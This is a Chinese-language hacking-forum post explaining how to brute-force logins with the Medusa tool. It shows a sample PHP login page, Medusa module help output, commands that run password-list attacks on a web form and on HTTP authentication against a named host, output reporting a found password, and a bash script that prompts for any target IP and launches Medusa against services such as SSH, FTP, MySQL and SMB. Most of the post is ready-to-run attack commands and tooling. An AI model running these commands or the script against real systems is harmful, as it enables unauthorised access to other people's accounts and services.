切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
185 暴力破解 Medusa 3[复制链接]
发表于 2012-10-2 16:25:00 | 显示全部楼层 |!read_mode!
WEB破解 看这个代码,代码保存为medusa.php
  1. <html>
  2. <body>
  3. <?php
  4. if(isset($_POST['u']) && isset($_POST['p'])) {
  5.   if($_POST['u']=='admin' && $_POST['p']=='123456') {
  6.     echo('ok-');
  7.   } else {
  8.     echo('error-');
  9.   }
  10. }
  11. ?>
  12. <form name="f1" method="post" action="medusa.php">
  13. <p>Login: <input type="text" name="u" /></p>
  14. <p>Password: <input type="password" name="p" /></p>
  15. <p><input type="submit" name="Login" value="Login" /></p>
  16. </form>
  17. </body>
  18. </html>
复制代码

如果账号是 admin 密码 123456 写出ok
不是 写出error
我们来破解试试

查看帮助

  1. root@Dis9Team:/tmp# medusa -M web-form -q
  2. Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  3. web-form.mod (2.1) Luciano Bello <luciano@linux.org.ar> :: Brute force module for web forms

  4. Available module options:
  5.   USER-AGENT:?       User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".
  6.   FORM:?             Target form to request. Default: "/"
  7.   DENY-SIGNAL:?      Authentication failure message. Attempt flagged as successful if text is not present in
  8.                      server response. Default: "Login incorrect"
  9.   CUSTOM-HEADER:?    Custom HTTP header.
  10.                      More headers can be defined by using this option several times.
  11.   FORM-DATA:<METHOD>?<FIELDS>
  12.                      Methods and fields to send to web service. Valid methods are GET and POST. The actual form
  13.                      data to be submitted should also be defined here. Specifically, the fields: username and
  14.                      password. The username field must be the first, followed by the password field.
  15.                      Default: "post?username=&password="

  16. Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"
  17.                  -m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"
复制代码

他需要数据包 抓包
抓包:


按照例子数据包替换为:
post?u=&p=&Login=Login
破解

  1. root@Dis9Team:/tmp# medusa -h fuzzexp.org -u admin -P /tmp/pass -M web-form -m FORM:"medusa.php" -m DENY-SIGNAL:"error" -m FORM-DATA:"post?u=&p=&Login=Login"
  2. Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  3. ERROR: Hostname resolved to multiple addresses. Selecting first address for testing.
  4. ACCOUNT CHECK: [web-form] Host: fuzzexp.org (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 1 (1 of 6 complete)
  5. ACCOUNT CHECK: [web-form] Host: fuzzexp.org (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 123 (2 of 6 complete)
  6. ACCOUNT CHECK: [web-form] Host: fuzzexp.org (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 12345 (3 of 6 complete)
复制代码
如果是需要密码访问的那种http 用http.mod模块

  1. root@Dis9Team:/tmp# medusa -M http -q
  2. Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  3. http.mod (2.0) fizzgig <fizzgig@foofus.net> :: Brute force module for HTTP

  4. Available module options:
  5.   USER-AGENT:? (User-Agent. Default: Teh Forest Lobster.)
  6.   DIR:? (Target directory. Default "/")
  7.   AUTH:? (Authentication Type (BASIC/DIGEST/NTLM). Default: automatic)
  8.   DOMAIN:? [optional]

  9. Usage example: "-M http -m USER-AGENT:"g3rg3 gerg" -m DIR:exchange/"
  10. root@Dis9Team:/tmp#
复制代码

除了-m DIR:exchange/ 目录以外其他不需要设置
例如:http://fuzzexp.org/1/

  1. root@Dis9Team:/tmp# medusa -h fuzzexp.org -u admin -P /tmp/pass -M http -m DIR:1
  2. Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  3. ERROR: Hostname resolved to multiple addresses. Selecting first address for testing.
  4. ACCOUNT CHECK: [http] Host: fuzzexp.org (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 123 (1 of 5 complete)
  5. ACCOUNT FOUND: [http] Host: fuzzexp.org User: admin Password: 123 [SUCCESS]
  6. root@Dis9Team:/tmp#
复制代码
附带个脚本


  1. #!/bin/bash
  2. echo ""
  3. echo -e "\033[41;37m ***************************************** \033[0m"
  4. echo -e "\033[41;37m *           Medusa Crack ScRiPt         * \033[0m"
  5. echo -e "\033[41;37m *       C0DE BY: xi4ojin orangelives    * \033[0m"
  6. echo -e "\033[41;37m *        - = D i s 9  T e a m = -       * \033[0m"
  7. echo -e "\033[41;37m *              WWW.DiS9.COM             * \033[0m"
  8. echo -e "\033[41;37m ***************************************** \033[0m"
  9. echo -e "\033[41;37m  source http://fuzzexp.org/code/medusa.sh  \033[0m"
  10. echo -n "The attack on IP:"
  11. read -e IP
  12. echo -e "[+] SELECTiON 0F ATTACK M0DULE"
  13. echo -e "[+] egs: 1"
  14. echo -e "[+] the type \033[41;37mftp\033[0m attack module"
  15. echo -e "1. ftp         5. pop3        9. vnc"
  16. echo -e "2. http        6. smbnt      10. svs"
  17. echo -e "3. mysql       7. smtp       11. rsh"
  18. echo -e "4. mssql       8. telnet     12. ssh"
  19. read -e select_m &> /dev/null
  20.           case $select_m in
  21.                     1)
  22.                          M=ftp
  23.                     echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  24.                          ;;
  25.                     2)
  26.                          M=http
  27.                                 echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  28.                          ;;
  29.                     3)
  30.                          M=mysql
  31.                                 echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  32.                          ;;
  33.                     4)
  34.                          M=mssql
  35.                     echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  36.                          ;;
  37.                     5)
  38.                          M=pop3
  39.                     echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  40.                               ;;
  41.                     6)
  42.                          M=smbnt
  43.                     echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  44.                          ;;
  45.                     7)
  46.                          M=smtp
  47.                     echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  48.                          ;;
  49.                     8)
  50.                          M=telnet
  51.                     echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  52.                          ;;
  53.                     9)
  54.                          M=vnc
  55.                     echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  56.                          ;;
  57.                     10)
  58.                          M=cvs
  59.                     echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  60.                          ;;
  61.                     11)
  62.                          M=rsh
  63.                     echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  64.                          ;;
  65.                     12)
  66.                          M=ssh
  67.                     echo -e "[+] M0DULE OF \033[41;37m$M\033[0m"
  68.                          ;;
  69.         *)
  70.         echo -e $"\033[41;37mError: Please select 1-12 between digital\033[0m"
  71.      ;;
  72.      esac
  73. echo -e "[+] Enter your USER dictionary"
  74. echo -e "[+] eg:/tmp/usrlist.lst"
  75. echo -n user file :
  76. read -e U
  77. echo -e "[+] Enter your P@SSWORD dictionary"
  78. echo -e "[+] eg:/tmp/password.lst"
  79. echo -n password file:
  80. read -e P
  81. medusa -h $IP -U $U -P $P -M $M
复制代码



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 21:23

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部